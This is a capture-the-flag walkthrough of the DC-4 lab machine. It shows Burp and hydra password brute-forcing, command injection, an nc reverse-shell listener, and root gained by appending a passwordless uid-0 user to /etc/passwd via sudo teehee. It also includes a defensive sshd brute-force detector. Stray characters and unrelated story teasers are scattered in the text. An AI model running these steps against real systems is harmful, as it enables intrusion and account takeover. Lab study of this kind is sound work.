CTF: Attacking the DC4 Target Machine

Lab environment setup:

0x01 Host Discovery

By capturing ARP traffic and matching the MAC address, the IP of the DC4 target is identified as 172.25.0.66.

kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                        
                                                                                      
 103 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 6180                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 172.25.0.1      00:50:56:c0:00:08     46    2760  VMware, Inc.                       
 172.25.0.2      00:50:56:f8:42:a0     28    1680  VMware, Inc.                       
 172.25.0.66     00:0c:29:4c:aa:59     28    1680  VMware, Inc.                       
 172.25.0.100    00:50:56:f7:88:92      1      60  VMware, Inc. 

0x02 Port Scanning

The scan shows that the DC4 host has an SSH service on port 22 and an HTTP service on port 80.

kali@kali:~$ nmap -A -p- 172.25.0.66
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 21:52 EST
Nmap scan report for 172.25.0.66
Host is up (0.00025s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds

0x03 Brute Force

Use Burp Suite (bp) to brute-force the admin login.
Capture the login request with the Burp proxy.


Send the captured request to the Intruder module for brute forcing.
First prepare a username dictionary and a password dictionary.
Dictionary reference: https://github.com/TheKingOfDuck/fuzzDicts
Brute forcing yields the password happy for the admin user.

The site's "System Tools" page can execute system commands.


Capturing and modifying the request shows that arbitrary commands can be executed (command injection).


Reading /etc/passwd shows the users with a login shell: root, charles, jim, sam.
Build a username dictionary from them: user.dic

Reverse shell with nc

kali@kali:~$ nc -lvvp 1234
listening on [any] 1234 ...
172.25.0.66: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.66] 39862
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak    // a password backup file is found under jim's home directory
cat old-passwords.bak

創(chuàng)建密碼字典oldpassword啸如,使用hydra工具進行ssh服務(wù)密碼爆破

kali@kali:~$ hydra ssh://172.25.0.66 -L user.dic -P oldpassword.dic -vV -s 22 -t 50 -o hydra.ssh
kali@kali:~$ cat hydra.ssh 
# Hydra v9.0 run at 2020-02-24 22:55:31 on 172.25.0.66 ssh (hydra -L user.dic -P oldpassword.dic -vV -s 22 -t 50 -o hydra.ssh ssh://172.25.0.66)
[22][ssh] host: 172.25.0.66   login: jim   password: jibril04
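From the defender's side, the hydra run above appears as a burst of sshd password failures from one source that ends in a successful login. As an added example (not part of the original writeup), this Python script parses constructed sshd syslog lines, flags sources whose failures reach a threshold inside a sliding window, and lists accounts that then authenticated from the same source; the log lines, hostname and thresholds are sample values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines in Debian syslog format (sample data, not from the DC-4 box).
SAMPLE_LOG = """\
Feb 24 22:55:31 dc-4 sshd[1201]: Failed password for invalid user sam from 172.25.0.69 port 40001 ssh2
Feb 24 22:55:31 dc-4 sshd[1202]: Failed password for root from 172.25.0.69 port 40002 ssh2
Feb 24 22:55:32 dc-4 sshd[1203]: Failed password for jim from 172.25.0.69 port 40003 ssh2
Feb 24 22:55:32 dc-4 sshd[1204]: Failed password for charles from 172.25.0.69 port 40004 ssh2
Feb 24 22:55:33 dc-4 sshd[1205]: Failed password for jim from 172.25.0.69 port 40005 ssh2
Feb 24 22:55:34 dc-4 sshd[1206]: Accepted password for jim from 172.25.0.69 port 40006 ssh2
Feb 24 22:58:10 dc-4 sshd[1301]: Failed password for jim from 172.25.0.1 port 50001 ssh2
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

def parse_events(log: str):
    """Return (timestamp, result, user, ip) tuples for every sshd password line."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog has no year; pin one so timestamps are comparable
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=2020)
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def find_bruteforce(log: str, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Flag source IPs whose failed logins reach `threshold` inside a sliding `window`,
    and record any account that then authenticated successfully from that IP."""
    by_ip = defaultdict(list)
    for ev in sorted(parse_events(log)):
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        failures = [(ts, user) for ts, res, user, _ in evs if res == "Failed"]
        # first failure at which the window ending there already holds `threshold` failures
        burst_end = next((ts for ts, _ in failures
                          if sum(1 for t, _ in failures if ts - window <= t <= ts) >= threshold), None)
        if burst_end is None:
            continue
        alerts[ip] = {
            "failures": len(failures),
            "users_tried": sorted({u for _, u in failures}),
            "accepted_after_burst": sorted({u for ts, res, u, _ in evs if res == "Accepted" and ts >= burst_end}),
        }
    return alerts
```

A non-empty `accepted_after_burst` is the case worth paging on: the spray succeeded and that account should be treated as compromised.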

Brute forcing yields jim's password; log in over SSH.
During information gathering, reading jim's mail reveals the password of the user charles.

jim@dc-4:~$ cat /var/mail/jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

Switch user to charles

jim@dc-4:~$ su - charles 
Password: 
charles@dc-4:~$ ls
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

0x04 提權(quán)

The teehee command may be run as root via sudo without a password.
Since teehee -a appends its standard input to the given file, it is used to append a user with uid=0 to /etc/passwd.

charles@dc-4:~$ sudo teehee -a  /etc/passwd
WuHanJiaYou::0:0:::/bin/bash
^c
charles@dc-4:~$ su - WuHanJiaYou
No directory, logging in with HOME=/
root@dc-4:/# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt 



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

至此提權(quán)成功妇汗,并拿到了DC4的flag

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市说莫,隨后出現(xiàn)的幾起案子杨箭,更是在濱河造成了極大的恐慌,老刑警劉巖储狭,帶你破解...
    沈念sama閱讀 218,204評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件互婿,死亡現(xiàn)場離奇詭異,居然都是意外死亡辽狈,警方通過查閱死者的電腦和手機慈参,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,091評論 3 395
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來刮萌,“玉大人驮配,你說我怎么就攤上這事∽鹞穑” “怎么了僧凤?”我有些...
    開封第一講書人閱讀 164,548評論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長元扔。 經(jīng)常有香客問我躯保,道長,這世上最難降的妖魔是什么澎语? 我笑而不...
    開封第一講書人閱讀 58,657評論 1 293
  • 正文 為了忘掉前任途事,我火速辦了婚禮,結(jié)果婚禮上擅羞,老公的妹妹穿的比我還像新娘尸变。我一直安慰自己,他們只是感情好减俏,可當我...
    茶點故事閱讀 67,689評論 6 392
  • 文/花漫 我一把揭開白布召烂。 她就那樣靜靜地躺著,像睡著了一般娃承。 火紅的嫁衣襯著肌膚如雪奏夫。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,554評論 1 305
  • 那天历筝,我揣著相機與錄音酗昼,去河邊找鬼。 笑死梳猪,一個胖子當著我的面吹牛麻削,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 40,302評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼呛哟,長吁一口氣:“原來是場噩夢啊……” “哼叠荠!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起竖共,我...
    開封第一講書人閱讀 39,216評論 0 276
  • 序言:老撾萬榮一對情侶失蹤蝙叛,失蹤者是張志新(化名)和其女友劉穎俺祠,沒想到半個月后公给,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,661評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡蜘渣,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,851評論 3 336
  • 正文 我和宋清朗相戀三年淌铐,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片蔫缸。...
    茶點故事閱讀 39,977評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡腿准,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出拾碌,到底是詐尸還是另有隱情吐葱,我是刑警寧澤,帶...
    沈念sama閱讀 35,697評論 5 347
  • 正文 年R本政府宣布校翔,位于F島的核電站弟跑,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏防症。R本人自食惡果不足惜孟辑,卻給世界環(huán)境...
    茶點故事閱讀 41,306評論 3 330
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望蔫敲。 院中可真熱鬧饲嗽,春花似錦、人聲如沸奈嘿。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,898評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽裙犹。三九已至尽狠,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間伯诬,已是汗流浹背晚唇。 一陣腳步聲響...
    開封第一講書人閱讀 33,019評論 1 270
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留盗似,地道東北人哩陕。 一個月前我還...
    沈念sama閱讀 48,138評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親悍及。 傳聞我的和親對象是個殘疾皇子闽瓢,可洞房花燭夜當晚...
    茶點故事閱讀 44,927評論 2 355